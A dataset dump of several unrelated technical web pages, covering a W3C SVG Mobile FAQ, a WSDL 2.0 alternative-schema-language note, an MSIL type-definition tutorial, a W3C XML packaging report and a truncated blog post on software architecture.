text stringlengths 20 1.01M | url stringlengths 14 1.25k | dump stringlengths 9 15 ⌀ | lang stringclasses 4
values | source stringclasses 4
values |
|---|---|---|---|---|
When will we start to see SVG Mobile implementations appearing?
They have already appeared, and are already available as shipping, released products from multiple vendors including BitFlash, CSIRO, Intesis, KDDI and ZOOMON. Other implementations are in development from companies such as Ericsson, Nokia and Sharp. As an example, here is the ZOOMON SVG Tiny implementation running on cellphones from Nokia and Sony-Ericsson which use the Symbian operating system (click for larger image).
The SVG Tiny being displayed on these phones is also available: [football animation, 27k] [monster animation, 6k]
When will we start to see SVG Mobile being used in a commercial context?
Commercial services using SVG Tiny are already in use on cellphones in Japan; other countries are expected to see such services shortly.
For example, here are some shots of a real Mobile Commerce application developed by KDDI Corp., - a major Japanese cellular phone carrier and member of the SVG Working Group - in partnership with JCB Co., Ltd., Toyota Finance Corp., Mitsui Sumitomo Card Co., Ltd., and UC Card Co., Ltd. It is using the SVG Tiny implementation from KDDI running on the KDDI "au" 3rd-generation CDMA20001x phones which have color screens. The customer is being shown an SVG map of the nearest participating store; in the next screen, zooming on the map reveals more details of how to get to the store, including smaller streets not visible on the larger view; in the last shot, the opening hours and contact details of the store are displayed in SVG as the customer walks towards the store to make a purchase just before closing time.
What is the relationship of SVG Mobile to SVG 1.1?
SVG 1.1 defines the full SVG language, including some powerful features that can currently only be implemented on a desktop or laptop computer. SVG Mobile defines two subsets of SVG 1.1, talking the most commonly used functionality suitable for mobile devices.
What is the relationship of SVG Mobile to SVG Tiny and Basic
SVG Mobile is the name of the specification that defines both SVG Tiny and SVG Basic, indicating that both these profiles of SVG are primarily designed for use on mobile devices.
SVG is text based - surely that makes the files very large?
Well designed binary systems can often be compact, at least until the extensibility mechanism has been used a few times to deal with enhancements. It is also possible to design a compact yet XML-compliant syntax, and further to compress it for delivery. SVG was designed to be small, and smaller yet when compressed. Compressed files play directly in the viewer.
In addition, SVG uses interpolation - the automatic construction of in between frames, similar to high-end animation systems - rather than explicitly stating the contents of each and every frame in an animation. This has a large effect on the size of the content - several mobile phone operators have cited smaller file size as a significant factor when choosing SVG Tiny over proprietary, binary alternatives - and also allows the framerate to be smoothly adjusted for the available computing power, without having to make multiple copies of the content for different devices.
Is it true that all SVG Tiny content will work on an SVG Basic or SVG Full implementation?
Yes, because SVG Tiny is a strict subset of SVG Basic, which is in turn a strict subset of SVG Full, all conformant SVG Tiny, SVG Basic and SVG Full implementations will correctly display all SVG Tiny content; similarly all conformant SVG Basic and SVG Full implementations will correctly display all SVG Basic content.
Can I use languages other than English in SVG content?
Yes, SVG uses Unicode to represent text strings for display; this means that multilingual text can be displayed, searched, and indexed. It also allows convienient server-side generation and customisation of text occurring in SVG content.
SVG also has its own font mechanism, allowing both creative freedom and the ability to provide fonts embedded into the content, for text in uncommon or minority languages. These fonts are not installed on the client system and disapear after the content has been viewed.
There are lots of SVG implementations - which one is the reference implementation?
Conformance to SVG is determined by the freely available and complete specification from W3C and is demonstrated by the publicly available test suite, not by the capabilities or quirks of one particular implementation from one vendor. This is a key differentiating factor of open Web Standards as opposed to closed, proprietary systems, which may have partial documentation available but which are defined by the behaviour of one implementation. It encourages market growth by enabling SVG implementors to compete on speed, footprint, quality and price without sacrificing interoperability or tying content creators and users to a single vendor.
What is the connection between Web Services and SVG?
Web Services provide the infrastructure for business-to-business (B2B) communication, and makes considerable use of XML. Often, such communication is between two machines; the various Web Services specifications govern this aspect. In most cases, human interaction is also required at some point. Web Services thus needs a front end for human interaction - one which is well documented, reliably implemented, and usable on a wide range of devices as well as providing the richness of graphics and typography needed for the task and also being based on XML. SVG is a good way to provide a dynamic, interactive, graphical interface for Web Services - particularly when combined with other XML technologies such as XForms (also created by W3C).
What are 'location based services' and how does this relate to SVG Mobile?
One of the key differences between desktop and mobile uses of SVG is that mobile devices, as the name implies, move from place to place. Because of their small size and weight, they are used in a wide variety of places where a desktop or laptop computer would be inconvenient. The geographical location of the device can be determined by various means, ranging from Global Positioning System (GPS) satelites to triangulation of cellphone signals, and this information can them be used to affect the graphical display. The most familiar example of a location-aware device is probably an in-car navigation system.
Because SVG files are XML, they can contain XML in other namespaces, such as various types of metadata. As an example of such metadata, SVG which visually represents a map can contain XML metadata describig the geographical area depicted and the coordinate system used to make a flat map from a portion of the earths curved surface. Combining this information with the location of the mobile device allows a "you are here" interactive map; combining multiple maps according to their geographic coverage allows information overlays to be built up; sending the location over the network allows geographically based queries, such as "where is the nearest hospital" to be performed. The combination of location-aware devices, location-enabled Web Services, wireless network access, and metadata-containing SVG maps with on-demand generated SVG graphics results in a location based service.
So SVG is mainly aimed at business users?
SVG is a neutral technology. The capabilities can be used in any way, limited only by imagination. SVG can be used to display business data such as graphs of financial information or visualisation of industrial process control, but it can also be used for consumer-oriented applications such as graphics messaging and games. As an example, here is an SVG Basic implementation of the card game "blackjack".
The SVG Basic for this game is available (30k)
Do any operating environments come with SVG support?
Yes, the standard software for the Texas Instruments OMAP application platform - popular in PDAs - includes the Bitflash Mobile SVG Player & SDK. Many Linux distributions also include one or more SVG implementations, not only for viewing and authoring Web pages but increasingly also used for graphical tasks in the operating system such as resizable icons.
Do any HTML browsers come with SVG support?
Yes, although older browsers do not have the necessary support for XML parsing and other related standards, newer browsers often provide the necessary infrastructiure to support SVG. The X-Smiles browser includes SVG support, the SVG in Mozilla project is maturing and the Konqueror browser - whose HTML renderer forms the basis of the new Apple Safari browser for MacOSX - has an SVG component under development. For older browsers unable to support inline SVG, plug-ins are available from Adobe and Corel.
What authoring tools are available for SVG Mobile content creation?
Existing SVG authoring tools, of which there are a large number, can be used to produce SVG Mobile content provided the output is validated to the particular profile desired.
Specific authoring solutions for SVG Mobile are also available. BitFlash Brilliance (shown below) is one such application. It provides three synchronized views of the SVG being generated - visual (graphical), DOM (structural) and the actual source code. Content can be validated to SVG Tiny or basic and non-conformant portions are hilighted so that they can be replaced or altered. Graphical previews, using an emulator, show what the content will look like on any desired screen size and color depth.
KDDI have announced a Mobile SVG authoring plugin (shown at right, below) for Adobe Illustrator, allowing a familiar authoring environment to be used to create SVG Mobile content.
Data-driven graphics for Web Services benefit from specialist authoring tools. Corel have announced a Smart Graphics suite of authoring tools especially aimed at this market segment.
ZOOMON have an SVG authoring tool, ZOOMON Composer for SVG Tiny animations, with a simple and easy to use interface, while e-animator from Sharp is another authoring application that reads SVG files and calculates the in-between geometry of an animation.
Highly interactive SVG solutions often use scripting. Intesis, who make an SVG Basic implementation for PocketPC, also produce a JavaScript Integrated Development Environment (IDE), allowing code to be developed on a PC, then debugged step by step on the target mobile device connected to the PC with a syncchronisation cable before deploying the solution on SVG Basic players from Bitflash, CSIRO, or Intesis. | http://www.w3.org/2003/01/svg11-faq.html | crawl-002 | en | refinedweb |
This is my own collection of useful C++ classes and templates, collected from my past job experiences, wishes or other open source projects that I partially forked.
This code begins with some support classes around the Oracle Database, but I try to recover some work about concurrency and network programming. It by structuring classes with following libraries and namespaces:
The base library: libaah
This is the base library for common functionality around OS, data structures, DBMS and more. Some parts of this library will be spinned off into their own separated library; but, by the way, it have the following namespaces:
- The aah::os namespace that is the root of all the OS abstraction.
- The aah::common with basic services for all kind of applications.
- The aah::nio namespace will content code for networking and I/O operations, and
- The aah::dbms::oracle namespace will content code for database access and monitoring. | http://code.google.com/p/aahora/ | crawl-002 | en | refinedweb |
This document is also available in these non-normative formats: PDF, PostScript, XML, and plain text.
Copyright © 2005 W3C® (MIT, ERCIM, Keio), All Rights Reserved. W3C liability, trademark and document use rules apply.
This document captures the result of discussions by the Web Services Description Working Group regarding WSDL 2.0 type system extensibilty at the time of its publication. The Working Group normatively defines the use of XML Schema 1.0 as a type system in the WSDL 2.0 Core specification. This document sketches out the basics of extensions for Document Type Definitions (DTDs) Web Services Description Working Group, which is part of the Web Services Activity.
The material in this note was previously published as an Appendix of the Web Services Description Language (WSDL) 2.0: Core Language Last Call specification. In response to Last Call comments, the Working Group agreed to remove this material from that specification and publish it separately as a Working Group Note. Current versions of WSDL 2.0 Core no longer contain this material. This publication differs from the previous material in that it also includes some expanded discussion of issues that should be given consideration by type system extension designers.
No further work on this topic is planned at this point. Errors in this document can be reported to the public public-ws-desc-comments. Issues facing multiple schema languages/type systems
3. Examples of Specifications of Extension Elements for Alternative Schema Language Support
A. References
B. Acknowledgements (Non-Normative)
1. Introduction
2. Issues facing multiple schema languages/type systems
3. Examples of Specifications of Extension Elements for Alternative Schema Language Support
3.1 DTD
3.1.1 namespace attribute information item
3.1.2 location attribute information item
3.1.3 References to Element Definitions
3.2 RELAX NG
3.2.1 Importing RELAX NG
3.2.1.1 ns attribute information item
3.2.1.2 href attribute information item
3.2.2 Embedding RELAX NG
3.2.2.1 ns attribute information item
3.2.3 References to Element Declarations
A. References
B. Acknowledgements (Non-Normative)
WSDL 2.0: Core Language [WSDL 2.0 Core] describes Web Service interaction in terms of exchanges of typed messages. WSDL only provides general support for type systems based on the XML Infoset [XML Information Set] and specific support for the W3C XML Schema Description Language [XML Schema: Structures]. Describing messages with WSDL using schema languages other than XML Schema or non-XML Infoset type systems requires extending the WSDL component model. While the Web Services Description Working Group has not defined any such extensions, there were discussions in the Working Group about how those extensions might be defined and used. This document is the result of those disucussions and captures part of the Working Group's thinking about schema language and type system extensibilty at the time of its publication. alongside the native last interpretation suggests a further general possibility: being able to define a union type (or other compound type) that spans distinct type systems (and, to further would prefer to specify with an XML Schema. This example is little artificial, as the Data Access Working Group could easily describe the entire results format in Relax NG.
The first interpretation is most in the spirit of WSDL and was strongly preferred by the Working Group. Since WSDL extensibility points are generally quite unrestricted, the Working Group did not try to enforce the first option, but the general belief of the Working Group was that the other options were confusing and unwise.
This section contains two examples of specifications of extension elements for alternative schema language support. Please note that those examples did not receive any implementation testing.
A Document Type Definition (DTD) as defined in [XML 1.0] may be used as the schema language for
WSDL. It may not be embedded; it must be imported. A namespace must
be assigned. DTD types appear in the {element
declarations} property of the
Description component and may be referenced from the
wsdl:input ,
wsdl:output and
wsdl:fault elements using the
element
attribute information item.
The prefix, dtd, used throughout the following is mapped to the namespace URI "".
The
dtd:import element information item
references an external Document Type Definition, and has the
following Infoset properties:
A [local name] of import.
A [namespace name] of "".
One or two attribute information items, as follows:
A REQUIRED
namespace attribute information
item as described below.
An OPTIONAL
location attribute information
item as described below.
namespaceattribute information item
The
namespace attribute information item
sets the namespace to be used with all imported element definitions
described in the DTD. It has the following Infoset properties:
A [local name] of namespace.
A [namespace name] which has no value.
The type of the
namespace attribute information
item is xs:anyURI.
The WSDL author should ensure that a prefix is associated with the namespace at the proper scope (probably document scope).
locationattribute information item
The
location attribute information item,
if present, provides a hint to the processor as to where the DTD
may be located. Caching and cataloging technologies may provide
better information than this hint. The
location
attribute information item has the following Infoset
properties:
A [local name] of location.
A [namespace name] which has no value.
The type of the
location attribute information
item is xs:anyURI.
The
element attribute information item
MUST be used when referring to an element definition
(<!ELEMENT>) from a
Interface Message Reference component; referring to an element
definition from a
Interface Fault component is similar. The value of the element
definition MUST correspond to the content of the
namespace attribute information item of the
dtd:import element information item. The
local name part must correspond to an element defined in the
DTD.
Note that this pattern does not attempt to make DTDs namespace-aware. It applies namespaces externally, in the import phase.
A RELAX NG [Relax NG] schema
may be used as the schema language for WSDL. It may be embedded or
imported; import is preferred. A namespace must be specified; if an
imported schema specifies one, then the [actual value] of the
namespace attribute information item in the
import element information item must match
the specified namespace. RELAX NG provides both type definitions
and element declarations, the latter appears in the {element
declarations} property of
Description component respectively. The following discussion
supplies the prefix rng which is mapped to the URI
"".
Importing a RELAX NG schema uses the rng:include mechanism
defined by RNG, with restrictions on its syntax and semantics. A
child element information item of the
types
element information item is defined with the Infoset
properties as follows:
A [local name] of include.
A [namespace name] of "".
Two attribute information items as follows:
A REQUIRED
ns attribute information item
as described below.
An OPTIONAL
href attribute information
item as described below.
Additional attribute information items as defined by the RNG specification.
Note that WSDL restricts the
rng:include
element information item to be empty. That is, it cannot
redefine
rng:start and
rng:define
element information items; it may be used solely to import
a schema.
nsattribute information item
The
ns attribute information item defines
the namespace of the type and element definitions imported from the
referenced schema. If the referenced schema contains an
ns attribute information item on its
grammar element information item, then the
values of these two attribute information items must be
identical. If the imported grammar does not have an
ns
attribute information item then the namespace specified
here is applied to all components of the schema as if it did
contain such an attribute information item. The
ns attribute information item contains the
following Infoset properties:
A [local name] of ns.
A [namespace name] which has no value.
The type of the
ns attribute information
item is xs:anyURI.
hrefattribute information item
The
href attribute information item must
be present, according to the rules of the RNG specification.
However, WSDL allows it to be empty, and considers it only a hint.
Caching and cataloging technologies may provide better information
that this hint. The
href attribute information
item has the following Infoset properties:
A [local name] of href.
A [namespace name] which has no value.
The type of the
href attribute information
item is xs:anyURI.
Embedding an RNG schema uses the existing top-level
rng:grammar element information item. It may
be viewed as simply cutting and pasting an existing, stand-alone
schema to a location inside the
wsdl:types element
information item. The
rng:grammar element
information item has the following Infoset properties:
A [local name] of grammar.
A [namespace name] of "".
A REQUIRED
ns attribute information items
as described below.
Additional attribute information items as specified for
the
rng:grammar element information item in
the RNG specification.
Child element information items as specified for the
rng:grammar element information item in the
RNG specification.
nsattribute information item
The
ns attribute information item defines
the namespace of the type and element definitions embedded in this
schema. WSDL modifies the RNG definition of the
rng:grammar element information item to make
this attribute information item required. The
ns attribute information item has the
following Infoset properties:
A [local name] of ns.
A [namespace name] which has no value.
The type of the
ns attribute information
item is xs:anyURI.
Whether embedded or imported, the element definitions present in a schema may be referenced from a Interface Message Reference or Interface Fault component.
A named rng:define definition MUST NOT be referenced from the Interface Message Reference or Interface Fault components.
A named Relax NG element declaration MAY be referenced from a
Interface Message Reference or
Interface Fault component. The QName is constructed from the
namespace (
ns attribute information item) of
the schema and the content of the
name attribute
information item of the
element element
information item An
element attribute
information item MUST NOT be used to refer to an
rng:define element information item.
This document is the work of the W3C Web Service Description Working Group.
Members of the Working Group are (at the time of writing, and by alphabetical order):), Asir Vedamuthu (Microsoft Corporation), discussions on www-ws-desc@w3.org are also gratefully acknowledged. | http://www.w3.org/TR/wsdl20-altschemalangs/ | crawl-002 | en | refinedweb |
Produce the highest quality screenshots with the least amount of effort! Use Window Clippings.
In this installment of the MSIL series, I describe how types are defined.
Here is a minimal reference type called House. As I write this, we are looking for a house in British Columbia, so this was the first thing that came to mind.
.class Kerr.RealEstate.House{ .method public void .ctor() { .maxstack 1 ldarg.0 // push "this" instance onto the stack call instance void [mscorlib]System.Object::.ctor() ret }}
This is a very simple type. Note that you must declare a constructor for a concrete reference type. Unlike languages like C# and C++, the IL assembler will not generate a constructor for you automatically.
Types are defined using the .class directive followed by a type header. The class keyword is used instead of the more intuitive type for historical reasons. When you read class in MSIL source code, just think type. The type header consists of a number of type attributes followed by the name of the type you are defining. To define the equivalent of a C# static class in MSIL you can write the following.
.class abstract sealed Kerr.RealEstate.MortgageCalculator{ /* members */ }
abstract and sealed are the type attributes. An abstract type cannot be instantiated and a sealed type cannot have sub-types. There are attributes to control visibility, such as public and private. There are attributes to control field layout, such as auto and sequential. For a complete list of attributes please consult the CLI specification. Many attributes are applied automatically, which can save you a lot of typing. Fortunately these defaults are quite intuitive so you should become familiar with them quickly. As an example, extending the System.ValueType from the mscorlib assembly defines a value type. Since the CLI requires that value types be sealed, the IL assembler will automatically add this attribute for you.
The name of the type in the example above is Kerr.RealEstate.MortgageCalculator. The CLI does not recognize namespaces as a distinct concept. Rather the full type name is always used. The syntax shown above is only supported by the IL Assembler that ships with version 2.0 of the .NET Framework. If you are working with version 1.x then you need to group your namespace members with a .namespace directive, as shown below. Note that this syntax is also supported in version 2.0.
.namespace Kerr.RealEstate{ .class abstract sealed MortgageCalculator { /* members */ }}
Following the type name you have the option of specifying the base type. The extend keyword is used for this purpose. If no base type is specified, the IL assembler will add the extend clause to make the type inherit from the System.Object type from the mscorlib assembly, resulting in a reference type. And finally, the type header can provide a list of interfaces that the type and its descendants will implement and satisfy, becoming the interfaces of the type.
.class Kerr.RealEstate.RoomList extends [System.Windows.Forms]System.Windows.Forms.ListView implements Kerr.IView{ /* members */}
In this example, the Kerr.RealEstate.RoomList type has System.Windows.Forms.ListView, defined in the System.Windows.Forms assembly, as its base type. Keep in mind that the CLI requires that every user-defined type extend exactly one other type. The RoomList type also implements the Kerr.IView interface type.
With this basic introduction to type definitions, you should now be able to start defining more interesting types. To define an interface, simply use the interface attribute in your type header. If you want a value type, known as a struct in C#, simply extend the System.ValueType type from the mscorlib assembly. Now you should be able to see why the .class directive is perhaps not the best name for it.
.class interface Kerr.IView{ /* members */ }
.class Kerr.RealEstate.HouseData extends [mscorlib]System.ValueType{ /* members */}
Read part 4 now: Defining Type Members
© 2004 Kenny Kerr
Thanks you!
If I write code with only MSIL, the code has a more performance than writing with C#?
Kim: In general the performance will be comparable. Keep in mind that C# simply produces IL. So assuming the C# compiler generates the best possible code, the performance should be the same. If you’re concerned about performance you may want to consider the Visual C++ 2005 compiler which tends to produce slightly more efficient code due to more advanced optimizations, but the difference is negligible in most cases. | http://weblogs.asp.net/kennykerr/archive/2004/09/09/227316.aspx | crawl-002 | en | refinedweb |
Copyright © 1999 W3C (MIT, INRIA, Keio), All Rights Reserved. W3C liability, trademark, document use and software licensing rules apply.
A specification that describes how to bundle XML and related files into a package for storage or transmission has been under discussion for quite some time. This report endeavors to capture the scope, problems and benefits that such a specification should encompass.
This Report is made available by W3C for discussion only. This indicates no endorsement of its content, nor that W3C has had any editorial control in its preparation, nor that W3C has, is, or will be allocating any resources to the issues addressed by the Report.
This report was made availble to the W3C membership in 1999, and is released to the public July 2000.
This report was made in order to deliver a study that was promised in the Briefing Package: Continuing work on XML. The relevant excerpt from the Briefing Package states:
"XML documents are also expected to be compound; they may consist of several
entities, along with associated style sheets, scripts etc. While there are
a number of existing packaging mechanisms (MIME multipart, zip, tar, ...)
that can be used to aggregate them, recommending one in particular or perhaps
designing an XML-specific packaging mechanism may enhance interoperability
and deployment of XML. Rather than chartering a deliverable to address this
issue, we propose to deliver a study on the issue in the form of a Note."
-- Dan Connolly, W3C XML Activity Lead
There is a great need for a general purpose packaging mechanism for XML and related files. The following five use cases were gathered from members of the XML activity and other related Working Groups over the last few years: and Incremental processing: received, for early display, content checking and terminating the transmission. From this we get a much more efficient transmission scheme.
So, what is really needed is a W3C REC that describes a general purpose, flexible, powerful and highly interoperable mechanism for collecting files into a group, adding metadata about the relationships between files, compressing, encrypting, authenticating, dynamically transmitting, processing incrementally, packaging and randomly accessing XML and related files. The idea is to invent new technology only when existing technology will not meet the needs of a Packaging Specification. Having the specification define which existing and new technologies will be used for XML Packaging supports the need for true interoperability.
Since a Collection is a grouping of Components, while a Package takes the same group of Components and packages them into one file, it can be observed that there is utility in both the packaged and the unpackaged form. There is even greater utility if it is easy to covert between packaged and unpackaged forms and vice versa.
Consider briefly how these two forms can be put to use in a client/server environment:
2. Single Package at server, single Package at client -- client downloads complete Package.
3. Multiple files at server, multiple files at client -- client pulls only those pieces needed, no decomposition needed at server or client.
4. Multiple files at server, single Package file at client -- client downloads complete Collection, composition at client.
Since all four scenarios have their uses, it would be very powerful if the packaging mechanism supported both the packaged and unpackaged forms. This "mode-neutrality" allows servers and clients to not care whether a Collection is packaged or not, because they can convert between modes efficiently. This distinction in processing the two representations should be confined to a basic "access level" and hidden at higher levels. Or put another way, given that there are two representations it must be possible to keep that reality as localized as possible within the processing application.
Naming conventions for Components in Collections should obey standard URL (or URI) naming conventions to facilitate this agnosticism to representation when processing. The URL for a Component within a Package should be the same as the URL for the Component if the Collection was not packaged. Moreover, to be consistent the Components must be able to refer to each other, whether the links are relative or absolute, in a uniform way whether they are separate or packaged (i.e., using base-relative URLs, where the base is the URL for the Package). Prototyping shows that this is fairly easy to achieve.
Given that one might want to efficiently serve up Components of a Package as multiple individual files, random access of a Component within a Collection is needed. Once the Index has been processed, it must be possible to extract a Component file from a Package without processing the other Components in any way, including just passing over them.
This shows the need for a Collection to have an Index that refers to all of the Components in the Collection, whether packaged or not, and gives file system like information about each file. The form of the Index would be part of the specification. The Index must not be combined with the Manifest, as will be shown. There are cases where an Index may not exist in a Package, while a manifest will be needed. Choosing a standard naming convention for the Index will make it easy for it to be found automatically.
Beyond the basic information required in the Index, there is a great need to associate Components with other Components, files outside the Collection and other metadata. This additional information makes many applications of XML Packaging much more powerful. After a discussion of this topic with Dan Connolly, Tim Berners-Lee and Bert Bos, Michael Sperberg-McQueen wrote:
(See)
The Association metadata will be stored as a special Component called the Manifest, whose content is an XML language defined for the Manifest. It is essential that this information be in a separate Component from the Index and other Components and not be built into the packaging mechanism. This leaves the Manifest available to both the packaged and unpackaged Collection. A standardized naming convention is needed for this Component.
The specification will need to define an XML tagset with its own namespace. The definition of a DTD, an XML Schema, or an RDF vocabulary for this tagset would be most helpful to specify exactly what kinds of metadata the Collection should be able to associate, and the semantics required by applications supporting this mechanism. The only tags defined should be ones that would be of broad general use to XML applications. This area of work could be a real time sink, unless the defined tags in the manifest is kept at a high level. More specific tags should be added to the manifest via an extensibility mechanism for application specific information.
The information that may be associated includes:
For interoperability, an easily extensible XML Language will be defined for the contents of the Manifest. It is a contract among implementers of the specification as to what applications will do with the information supplied in the Manifest. The extensibility of the Manifest language will allow specific applications to add there own tags, though there is no guarantee that such tags will be interpreted by fully compliant XML Packaging clients or servers. What follows is an example of what a manifest file could look like:
<XMLPackagingManifest xmlns=""> <maindoc href=??> <stylesheet href=? <stylesheet href=? <schema type="Schema" href=?> </maindoc> . . . </XMLPackagingManifest>
Web servers are increasingly generating information dynamically. Web Clients need to process much of their information incrementally. Support for dynamically generated information and incremental processing in the Packaging specification would make the specification much more useful.
For example, one could first create and write the Package on a server disk, then transmit it, and finally erase it. But by simply skipping the file storage portion and sending the data along as it is being created sequentially as if it were an Package file transfer, we get a much more efficient scheme. This works because writing the file is normally done sequentially, which is the same order as needed for transmission. On the client side as the package is received incremental processing could begin on the package, to allow earlier display, or the passing of the information to a particular application. Interfaces are available to de-couple the file reading from the transmission and fake the file reading.
For dynamically created documents the interesting thing is that, assuming the client has no reason to save the data to the file system, we have a communications transaction that is almost completely based on a file format, yet no explicit file ever exists. But the file format is vitally important, since it forms the basis for the communications between the client and server.
When transmitting a Collection of Components, some of them may be created on-the-fly and their sizes may be difficult or impossible to obtain when needed. In general, the API's for server applications and extensions (such as CGI) do not provide adequate information for determining sizes, so short of buffering up the whole Component, there's no way to find out the size of a dynamically created Component. Once the size of one Component is not known, it is impossible to determine the starting byte for any subsequent Component. Hence it is not possible to generate an Index for a Package containing dynamically created Components on all systems. We therefore cannot require that an Index be generated when dynamic content creation is taking place.
Just as it is generally difficult or impossible for a server to pre-compute the sizes of all dynamically created Components of a Package, it is generally easy for a client to compute sizes. This information is either intrinsic to the transfer protocol, or readily available in the downloading and buffering mechanism.
All of the above supports the idea that the Index information for a Package can be optional. However, there are some very useful applications of XML Packaging for which a client should have a minimal burden of recomputation. If the transmission format, as a string of bytes, is EXACTLY what is stored as a file, including Index information, the receiver can employ normal file transfer software to file away a Package no matter how it is sourced. You can now mix and match server and client mechanisms in very arbitrary ways which greatly increases the flexibility and usefulness of the Package format. The objective therefore is to enable the general usage of XML Packaging without preventing very simple usages over simple file transfer protocols.
Even though the Index is now optional, support for both indexed and indexless modes should be supported in conforming implementations. An obvious consequence of implementation conformance is that the first thing a client should do is check the Package for an Index. If it doesn't have one, scan through the whole Package and reconstruct the Index. At the user's discretion or as required, the client can rewrite a Collection or Package with the Index.
For picking a given Component out of a serial transmission of Components the simplest thing is to have Component boundaries within the serial transmission. There are two common ways to do this:
The Manifest may still be useful. But, some of the Manifest information may not be known until after sending all the files. Others Associations may be known ahead of time. If an incomplete Manifest is transmitted first, followed by the stylesheet, and the XML file, while receiving the rest of the files, display of the first XML file could begin. If we wait to the end to send this Association info, then display processing could not begin until after the whole Package had been sent. For the dynamically created Package case, a Manifest may be allowed anywhere in the Package. It needs to be decide whether subsequent Manifests can be built to add to the information from the previous Manifest or to have subsequent Manifests supersede the previous ones.
Clients should be allowed to take subsets of the Package presented by a server, and servers should be allowed to send selected subsets to clients.
What is truly needed is real compression capability, so that binary data can be handled and honest compression delivered. It's essential that the compression and decompression method allow for processing as an in-stream filter, and the compression be done at or below the level of the packaging -- not by separately compressing an entire Package -- so as to retain the ability to randomly access a single file within the Collection independently. Files that are already compressed, such as JPEG files, should not be subjected to further compression when packaged. A server may be asked to transmit a Component from a Package over a slow communications line. If the file was compressed when packaged, it should be possible to unpackage it without decompressing it. This implies that each individual Component can have a compressed and/or uncompressed representation when standing alone.
Given that a single file can be compressed by making it a one Component Package, that compressed/packaged file can participate with other files in yet another packaging of the whole set. Or in other words, one way to have a compressed form for any file is to have a trivial packaging of that single file. It is probably best to recognize such nesting within the standard and to be able to optimize processing by doing nested packaging and unpackaging in one operation.
There should be very few choices of compression technology, ideally one, per related file types, to avoid the proliferation of variants of the XML Packaging specification. This is easier to implement, document and understand.
Zlib is a software library that implements the zlib/deflate compression method. This software is copyright Jeanloup Gailly and Mark Adler. It is freely available, free of patent issues and unencumbered by restrictions on commercial use.
Bzip2 is an up and coming freely available, patent free, high-quality data compressor.
Tests on a large XML files shows the following results:
Note, bzip2 averages 27.92% better compression than gzip.
More research indicates that there is a broad range of compression percentages on small to medium sized XML files. More research is needed in this area, as timing was not tested. It would be good to know what sizes of XML files are less time consuming to transfer, by not compressing and decompressing, but just sending the file in its normal state.
It may seem strange that so much of the work on XML Packaging is on areas outside of the physical packaging mechanism. As has been demonstrated the work of defining a Collection and Index that supports random access, specifying Association metadata within a Manifest, while mixing in support for Dynamic Creation, Incremental Processing and File Compression methods is separable from the actual packaging mechanism. But, it is a very important part of the work of the working group. The mechanism chosen for physically packaging the Components will greatly determine which features as outlined above may, or may not be supportable.
XML is an obvious mechanism to consider when considering a packaging mechanism. XML is simple. It should not take to long to design a mechanism that uses XML. It allows us to use a standard tool to do much of the work. Many have suggested XML as a packaging mechanism. Problems with XML:
ZIP is a highly used format for packaging information for transmission on the web. Other packaging formats are based on ZIP, such as JAR, Java Archive, and CAB, Cabinet files. The following paragraphs contains information on ZIP, some of which is the ZIP file format specification, and another part being the source code for zip and unzip:
It is understood that as long as InfoZIP's copyright is left in place, the working group can do more or less as it pleases. It is also believed that nobody else has credible intellectual property claims to either the code or the algorithms that are used by ZIP.
A quote from says:
"In other words, use it with our blessings, but it's still our [InfoZIP's] code. Thank you!"
At least one publisher has implemented the Zip packaging technology for electronic distribution of book files. They have used a proprietary encryption scheme for component files, while leaving the Zip structure in the clear to get around the direct access to component files problem. Problems with ZIP:
MIME is also very well known and highly implemented. The ability to package groups of files into one file for internet transmission via the use of MIME is used by most mailers today. The following link cites over 24 different RFCs pertaining to MIME (caveat: Some of the links are broken, refer to for the truth).
Of particular interest are: "MIME Encapsulation of Aggregate Documents, such as HTML"
"MIME Multipart/Related Content-type"
"Content-ID and Message-ID Uniform Resource Locators"
There is also a mailing list that discusses the use of MIME and XML, the IETF-XML-MIME mailing list, and it can be found at:. Problems with MIME:
The group may choose to invent its own. This is not impossible. It's advantage is that you can design it to do everything in the specification, and you do not need to carry the problems of a legacy system. Problems with Creating a New Mechanism:
A group should be chartered to look into XML Packaging, and see if most of the features described in this report can be support. The new group needs to produce specification(s) that stimulates the development and widespread use of a highly interoperable XML Packaging Recommendation, for both general purpose and application specific XML Packaging needs. It is best that the group produce at least 2 interoperable implementations to demonstrate the effectiveness of the specification. | http://www.w3.org/1999/07/xml-pkg234/Overview | crawl-002 | en | refinedweb |
What is success? Is it the culmination of a project? Is it the application of requirements? Is it the ability to enjoy the outcome of one's work and build upon it in the future? If you ask me, it's the latter because only when you can truly maintain and extend an application then the architecture has been a real success.
Often, business will try to justify a lower-cost or simpler solution on the basis that a program has a fixed life expectancy and that the business clearly knows what they want. They argue that scope will never change, cost today is more important than cost tomorrow, and we have to get it done yesterday. I've seen many projects built under these assumptions and they all have one thing in common: failure.
More specifically
Projects that are run like this are done so purely for immediate political expediency; and when these failure points come up, they are always politically painful to fix.
So, what is Success Oriented Architecture? Simply, it's an architectural philosophy with the following tenants:
Let's look at these one-by-one.
KISS, otherwise known as Keep it Simple, Stupid, is the rallying cry of lazy programmers everywhere. Why write ten lines of code when you can cram it into five? Five lines of code must be simpler than ten lines of code and must also be easier to maintain, etc. We've all worked with these people. You may be one of these people. These people could not be more wrong. About the simplest thing in the world is the wheel, but even the wheel needs an axle to be useful. To keep the wheel on the axle you need a pin. To keep the pin in the axle you need to bend it. To carry things on the axle you need a container. To lift the container off the ground you need a lever. Soon, you have a cart which is decidedly more complex than a simple wheel. All we have to do to see that the wheel in its simplest state isn't useful is to simply look at this example. Are we cavemen or programmers? We need to be able to realize that too much simplicity sucks and that it really is necessary to include design elements that add robustness to an architecture.
Readable code makes it clear what code does, and how it's accomplished; discrete actions are clearly seen and ambiguity is avoided. Let's look at some very hard to maintain code:
1: public class test
2: {
3: public static void main(string[] args)
4: {
5: Console.WriteLine(A.Calculate(B.InverseOf(C.MinValue(new D(args)))));
6: }
7: }
So, when you get a NullReferenceException on line 5, where are you going to find the bug? Can you even determine what variable is involved with the bug? Yet, in the name of "efficiency" or "simplicity" we see code like this all the time. Would we not be better serviced with code that fosters debugging and maintainability?
1: public class test
2: {
3: public static void Main(string[] args)
4: {
5: D d = new D(args);
6: var c = C.MinValue(d);
7: var b = B.InverseOf(c);
8: var a = A.Calculate(b);
9: Console.WriteLine(a);
10: }
11: }
Object Oriented Programming has three tenets: Encapsulation, Inheritance and Polymorphism. Each of these three individually allows you to create systems that are better than your standard bowl of C spaghetti, but it takes some planning to get the true value out of OOP; and that value is loose coupling.
